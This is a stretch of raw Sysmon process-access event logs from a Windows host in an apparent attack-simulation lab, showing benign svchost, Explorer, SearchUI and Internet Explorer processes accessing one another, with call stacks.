13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:43.442{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.994{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.994{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.986{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000014297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10abbf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10abbf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10abbf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10abbf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab73(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab73(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab73(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet 